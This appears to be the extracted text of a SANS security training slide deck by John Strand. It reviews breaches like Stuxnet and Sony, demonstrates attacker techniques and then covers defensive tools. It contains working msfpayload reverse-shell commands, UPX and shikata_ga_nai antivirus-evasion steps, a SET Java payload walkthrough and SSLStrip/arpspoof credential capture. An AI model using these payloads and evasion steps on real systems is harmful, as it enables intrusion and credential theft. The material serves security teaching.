If I wake up evil... John Strand SANS Black Hills Information Security.

If I wake up evil...John Strand

SANSBlack Hills Information Security

State of the Hack(Why We are Losing)

• The attackers have a clear advantage on uso They don't play by any ruleso We do...o They have a well defined structure for learningo Little to no attribution

• Many think that compliance equals securityo This is not trueo Compliance with regulations is a guidelineo They are a series of objectives

• Many times we don't have time to "know" our networks and systems

Malware Example:Conficker

• Devastating worm that infected over 15 million computers

• Infection through MS08-067, file shares and removable mediao Microsoft disabled autorun in response to this

worm• Highly effective defenses

o Tries to kill AV every secondo Blocks certain DNS lookupso Disables Auto updateo Disables Safe-mode

• Updates itself• Uses crypto

State Of The Hack:Sony

• 100 Million accounts compromised• Shut down their network for 23 days• $171 million in lost revenue and costs• By the way, there were multiple Sony hacks this quarter• Cross analysis between 1 million Sony passwords and

250K Gawker passwords revealed that many people reuse passwords– http://www.theregister.co.uk/2011/06/08/

password_re_use_survey/• Also, many people use password complexity exactly like

we have trained them– And it still does not work

State Of The Hack:Bank Of America

• “Hundreds” of accounts compromised– But in this case size does not matter

• The accounts we targeted “high value” targets• The attack was launched by an insider• Overly elaborate attack

– Ordered new checks, forwarded phone calls and arranged for the check pickup

– The attackers were unaware of automatic bill-pay...?• 10 million dollars stolen• How do we defend against an insider?

State of the Hack RSA

• About the RSA attack..– It might be worse than we thought, and we thought it was bad

• Attacks against LMCO, L-3 and possibly Northrup Grumman

• SecureID’s generate a “random” pin every 60 seconds• This pin is based on a random seed file that is shared byt

the server and to token• If you obtain the seed file from the server (.ASC or .XML)

you can clone the pin on the fob• What if RSA was storing PINs for its customers?• What if those PINS were compromised• Unfortunately, we don’t know a whole lot

Wait, what?

Hi John,

Company X is asked every day if Product X could have stopped the latest du jour threat that is bypassing traditional blacklisting-based antivirus.

On June 26th, 2010, we showed how Product X beat down Stuxnet. On August 26th, Product X beat down DLL Hijacking attempts. The threats keep coming, so which ones should we beat down next?

How did it Infect?

• USB… Yep, plain old USB• The easiest way to bypass the firewall, IDS and IPS• There were a number of 0-days

– .lnk file vulnerability– Print Spooler (CVE-2010-2729)– Win32 Keyboard Layout Vulnerability– Privilege escalation via Task Schedule

• There has been some misinformation about the Task Scheduler vulnerability from some AV vendors– You do not need to be in the local administrators group

• It also used some older exploits like 08-067 – Conficker anyone?

On to the Details

• Remember the Windows baseline section of 464?– tasklist /m– tasklist /m s7otbxdx.dll

• Stuxnet used dll replacement to insert execution redirection

• In fact, it moved s7otbxdx.dll to s7otbxsx.dll inserted its own s7otbxdx.dll – This is important because it means the attackers had an

understanding of the original code– 93 of the original 109 exports are forwarded to the

renamed s7otbxsx.dll – The remaining 16 get us excited

How did it Communicate?

• Once it infects a system it tries to connect to two sites to verify connectivity:– www.mypremierfutbol.com– www.todaysfutbol.com– Clearly not targeting a US audience….

• P2P Communication• C2 servers in Malaysia and Denmark

– Checking Versions• It also uses peer-to-peer communication• Remember what we covered in the network lab?

– Yeah, it tried to spread via shares– Watch that system-to-system communication

• Watch for PLC systems connecting to the Internet

Clouds.... Evil Clouds.

What is Cloud Computing?

• I had to look it up– I hear about it a lot, but I don’t have a clear concept

of what it is• Straight to the Wiki!

– “Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.”

• I get it… It is like a Bot-Net!

• Based on Vendor Information it looks like it is going to make me irrelevant

But What is it?

• “It is a paradigm shift..” Oh oh… This is going to be good.

• It is a paradigm shift following the mainframe and client-server shifts

that preceded it. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them.[1] Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically

scalable and often virtualized resources as a service over the Internet.[2][3] It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet.[4]

• The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network [5], and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents.[6] Typical cloud computing providers deliver common business applications online which are accessed from a web browser, while the software and data are stored on servers.

I Am Letting Wikipedia Write All of My Presentations!

• Security could improve due to centralization of data[35], increased security-focused resources, etc., but concerns can persist about loss of control over certain sensitive data, and the lack of security for stored kernels[36]. Security is often as good as or better than under traditional systems, in part because providers are able to devote resources to solving security issues that many customers cannot afford.[37] Providers typically log accesses, but accessing the audit logs themselves can be difficult or impossible. Furthermore, the complexity of security is greatly increased when data is distributed over a wider area and / or number of devices.

Looking Forward To Unemployment?

But Wait!!!Did they say “Internet”

• “The term cloud is used as a metaphor for the Internet.”

• But the Internet is Evil!!– How can this be so?

Lets set the stage..

• We have to know who it is we are working with

• Who are the people we are defending?• Who is attacking?

– What are their capabilities?– What are their means?

• What are the tools we have to defend ourselves?

• Who is on our side?

Your Users

• They are trying to go places they shouldn’t• Security is not a major concern

– They never get into trouble• “It was just a pop-up!”

– They “think” they know what it would look like if they were attacked.

• No skull and crossbones? Good to go!

• You “think” they are “stupid”• Are they?

Granny Max

• Loves to gamble• Likes Polka Dots• Likes anything with

“Polka” in it• Thinks the CD tray is a

coaster• Collects Gnomes• Bypasses your outbound

web filters buy using a third party anonymizing proxy

Phil… From Accounting

• Works with numbers…

• ... and Terabytes of Porn!

• Has a “slight” problem

• Does not get along with Granny Max

• Hates cats• Bypasses your

filtering by using a SSH tunnel through his home system

The “Average” Users

• Do not gamble…– … at work

• Do not surf porn…– ….at work

• Likes: Facebook, YouTube, Politics, eBay, Googling, Fantasy football, Fark, Drudge Report, the Huffington Post, CNN, Amazon

• Dislikes: Web filters• Quickly becoming friends

with Phil and Gran Max to learn ways to bypass your filtering

The Bad Guys

• Motivated– Can you imagine their

HR department?• Wicked skilled (more

on this later)• They either own or

infect many of the sites your more “interesting” users are going to

The Bobs

The Cloud

• The Internet is big…• … really big• You just won't believe

how vastly hugely mindboggingly big it is...

• Most of it is worthless.. and Evil!

• Many of your users will not stop clicking until they visit every site

Lets Compromise An Account

Bypassing AV

• "But Anti-Virus software will protect us... Right?"

• Anti-Virus, like all software, has its limitations• Do not believe for one second that it is the

ultimate protection• It works great for detecting and removing

known malware• That means someone was infected before you• Many dedicated and targeted attackers are not

concerned about anti virus software• But why?

How Would an Attacker Bypass AV?

– There are a variety of ways– But remember the goal is to create a "new"

signature– Attackers can use packers to "pack" the malicious

code• This creates a self-extracting and executing file• In the process of packing the executable is scrambled• Functions may not be where AV expects them to be

– Attackers can also use tools to "encode" the executable

• This has been around for a long time in tools like ADMutate and PEScramble

• One technique these tools use is to add a large number of "jumps" to the code making it difficult to reverse

No Tricks

• Let's say an attacker wanted to create an executable that created a reverse connecting, memory based rootkit

• Straight msfpayload to an exe• ./msfpayload

windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8081 X > PlainMetrev_8081.exe

Not Too Bad..

But Wait!!!

Thank You Panda…

Add a Bit of UPX..

• Attackers can use compression as a means to bypass AV products

• One product that attackers often use is the Ultimate Packer and Unpacker for Executables (UPX)

• upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exeo This will create an executable that is compressed

with a setting of 2o The settings go from 1 to 9 o The higher the level the greater the compressiono 2 works very well for bypassing AV

Cut in Half?

What if We Used the Browser for Communication?

• ./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=9091 X > PlainShellRevHttp_8081.exe

• This is slightly different than the previous example

• This is a shell that makes a reverse HTTP connection

Down to Only 17.95%

What if We Try a Reverse http Shell with Encoding?

• ./msfpayload windows/shell/reverse_http LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' " -t exe -o EncShellRevHttp.exe

• We are now using encoding on the executable• This means the executable will be different every

time it is created• The default encoder with the Metasploit framework

is "Shikata ga nai"•  This means "There is nothing that can be done

about it" in Japanese

Race to 0

Bypassing IDS

• There are a variety of ways to bypass AV• But what about IDS?• Turns out many IDS products have the same

"signature-based" problem• Some claim to be "heuristic"• We can fragment our attacks

o Separate the attack across multiple packets• We can encode the attacks

o Into Base 64o Unicodeo Hex

Bypassing IDS:Uncreative, Yet, Effective Ways

– Why not have the victim system connect to us!• We bypass many firewall and IDS/IPS restrictions• We can make it look like standard web traffic

–  We could have our attacks go over Secure Sockets Layer

• Many organizations are using SSL to protect their traffic in transit

• However, it often blinds them to attacks against their web servers

• Attackers can try Cross Site Scripting, SQL Injection and Command injection all day long

– Remember just because there is a lock it does not mean it is "secure"

Blending with Normal Processes

• One of the easiest ways for an attacker to hide or even attack your systems is to "blend-in"

• Many people think that an attacker will only use exploits to "spread" through your networko This is not true

• Rather, they will utilize built-in services and commands to compromise additional systemso SSH or RDP with accounts and passwords from the first

system compromised• This will not be caught by your IDS because it is

"normal" traffic

Exploit Demo

Java as a Payload

• Java is an excellent payload option– Installed pretty much everywhere– Users are accustomed to clicking “Run” for Java apps

• SET has the ability to take a Metasploit payload and export it to a .jar file

• In this example we will be taking the default SET web page and inserting a .jar file into it

• When a user connects to our site the java app will load

• Shell will ensue

Its what's for breakfast.

Starting SET

Nice ASCII Art!

SETting Options

Hack By Numbers!

Please select Option Number 2

SET Website Attack Vectors

The Option We Will Be

Using

Very Effective

If You Know HTML

Import your own website is even more effective if you are

not particularly good at HTML

Choosing Java as Our Payload

Can be flaky

Setting the Payload Type

• Meterpreter and VNC payloads are nice- However, they can be unstable

• Shell Reverse_TCP tends to be the most stable in testing

• Knowing if your target is running 64 bit can be a big help

Please Select Option 1 for 32 Bit

Or, 6 for Windows 64 Bit Systems

Setting the Encoder

We Are Going to Use

shikata_ga_nai

We Will Encode Twice

Linux and OS X Payloads

Please Choose “no”

Metasploit Starting

Payload in Waiting

Reverse Payload Listening on 4444

Because Cows are Cool

Browsing to Your Site

Everyone Clicks “Run”

http://[Your Linux IP]

Got Shell?

• Yes!!!• Now you can wield your Windows Command-

line Kung-fu!

Interacting with Our Shell

Time to do the “Happy Dance”

There are other ways...

ISR Evilgrade

• Modular exploit tool to spoof Software Update Responses– "Yes, there IS an update available!"

• Delivers executable of your choosing to the victim• Includes support for multiple vulnerable updaters

– JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more

• Relies on MITM from third-party attack– LAN and Ettercap, or remote with DNS manipulation

• Perl-based console interface similar to Cisco IOS– Output and navigation slightly messy

USB Threat Update

• Let’s say you disabled Autorun on all your systems

• Further, let’s say you disable USB mass storage devices

• You can still be compromised by a tin of Altoids• Enter Programmable HID USB Keystroke Dongle• The latest attack vector from IronGeek• He is now trying to find fixes• Implemented S.E.T• Upload any Metasploit Payload

Wireless Device Control“My SSID is P0wned”

• “But we do not have wireless in our network!”– Are you sure?

• One access point can bypass all of your external controls

• “Free Wireless Internet” anyone?• Attackers do not need to find an access point

– They just need to find a client– Karmetasploit is evil

• This also goes for your phone– Do you use GSM?– http://www.shmoocon.org/presentations-

all.html#srsly

Maltego

• By Paterva • Focus is on “extreme” reconnaissance • GUI based display

– I know… I know.. But the GUI rocks• We can pull

– Personal Information– Sites– Additional Email addresses– Friends?– Family?– Intrests

Who is John Strand?

Step 1:Click EmailAddress

Step 2:Click Here

Step 3: Fill In Email

Starting the Transformations

Right clickAnd SelectAll Transforms

It can be a lot of data

Click Yes

What did we find

Linkedin

A friend

What about SSL?

• There are a number of different ways to hijack SSL– See WebMTIM from dsniff

• Unfortunately the user will receive “negative feedback” – Just another way of saying they get a pop-up

box• Most users will click through

– The paranoid ones will not• So how do you hijack the overly paranoid

user?

We can use SSLStrip

• Another great tool from Moxie Marlinspike• This tool strips away SSL from the end user

– Hence the name• The HTTPS will become HTTP

– No negative feedback to the user• The vast number of users will not notice

– Even the very paranoid ones• The 300• We need to use a tool like dsniff to hijack the

traffic and a tool like iptables to redirect the traffic to where sslstrip is waiting

SSLStrip

Get your targets IP and Gateway

SSL Strip

SSLStrip: iptables

SSLStrip: arpspoof

SSLStrip: Got one!

• Now Surf to http://gmail.com and try to log in!

You should see some activity in SSLStrip!!

SSLStrip: Checking the logs

Looks like we got some data!!!

SSLStrip: Looking at the log

SSL Strip: /hackme

Paydirt!!!

Starting over..

Back to Basics…

• Baseline your systems– Processes, DLL’s for Core applications, Users, etc.

• Baseline your network traffic– Why would you allow PLC systems to connect to the

Internet?• Monitor those baselines

– If at all possible, do this hourly• Don’t use shady Russian contractors with

compromised websites• Train everyone, because everyone is a target

– Secure the human• Yes, even you

– Sounds paranoid, I know

Risk and the 20 Critical Controls

Autostart Entry Points

• There are a number of Autostart entry points on your Windows systems

• Run• RunOnce• RunOnceEx

• There are a lot more of these than we can cover in a few slides– Useruinit– Boot.ini

• There needs to be a better way to look at what is going to automatically start on our Windows computers

Sysinternals Autoruns

Find Evil

Red Curtain

Malware Detection on Linux

• Rather than look for specific malware we can also look for indications of compromise

• Rootkit Hunter and chkrootkit do this• They also look for a few specific binaries• Very easy to set up and use• Looks for

– Certain hashes– Wrong File permissions– Hidden Files – Orphaned files

• Why use both tools?

Malwarednsscrap.pl

• Sometimes the best way to know you are compromised is to check your DNS cache

• Not 100%, but nothing is• This script queries your DNS server and sees if

there are any DNS entries that are for “bad” sites• It can automatically pull down a blacklist and do a

compare• However, you can provide your own blacklist• Best used daily (think Nagios)• http://www.mayhemiclabs.com/tools/

malwarednsscraper

Running Malwarescraper.pl

GoodBad

Offensive Countermeasures:Is this allowed?

The Split

• When discussing security we need to be of two separate minds– Offensive– Defensive

• A little lesson on OODA loops– Observe– Orient– Decide – Act

• In our current defensive postures how can we do this

Dynamic BlacklistingWindows

• @echo offfor /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do@for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block

• Easy copy and paste link from:– http://pauldotcom.com/wiki/index.php/Episode203

Dynamic BlacklistingLinux

• [root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done

• Easy copy and paste link from:– http://pauldotcom.com/wiki/index.php/Episode204

Portsentry

• Does the same thing we covered in the Blacklisting section

• However, it does offer more flexibility– Logging– Rerouting traffic– Blocking through hosts.deny

• A bit of an older tool (2003) but still surprisingly effective

• Set it up before an audit or a penetration test and make your Linux/Unix systems “go away”

• Still requires a listener (nc) on a honeyport.

Word Web-Bugs

• Very easy to use• Supposed to be used for penetration testing• However this tactic works great at tracking

intellectual property• Not all ways of finding attribution need to result in

shell access• Far less likely to crash a system• Embed this code in a spreadsheet called SSN.xls

and watch how fast an attacker runs the macros

How does it Work?

• It simply inserts a reference to a css or image to a web server

• When the doc is opened it tries to open the URL• Direct connection!

Metasploit De-cloak Engine

• Hunting back where the attackers are coming from• This is done by having the victim/attacker connect

back using a number of applications – Java– iTunes– Word– FTP– Quicktime– DNS

• By having them connect in a number of different ways with different applications we increase the odds of finding their “real” IP address

Running the De-Cloak Engine

Results

Implementing the Decloak Engine

• You can use their servers– Generate a MD5 string based on the attacker/victims

information– Embed an iframe directing them to the decloak site– Recover the information gathered from decloak.net

• You can also implement their API’s on your servers– Implement a custom DNS server– Create a Database for the results– Embed the the Java and Flash applications from

decloak.net

SANS Denver!!!June 25-30

• http://www.sans.org/rocky-mountain-2011/• SANS Security Essentials Bootcamp Style• Management 414: SANS +S™ Training Program for the

CISSP® Certification Exam– ISACA10 = 10% off

• Management 512: SANS Security Leadership Essentials For Managers

• Security 504: Hacker Techniques, Exploits & Incident Handling

• Security 505: Securing Windows• Developer 522: Defending Web Applications Security

Essentials• Forensics 558: Network Forensics

John’s Contact Information

• Strandjs = twitter• www.blackhillsinfosec.com• www.pauldotcom.com• 303-710-1171• 605-550-0724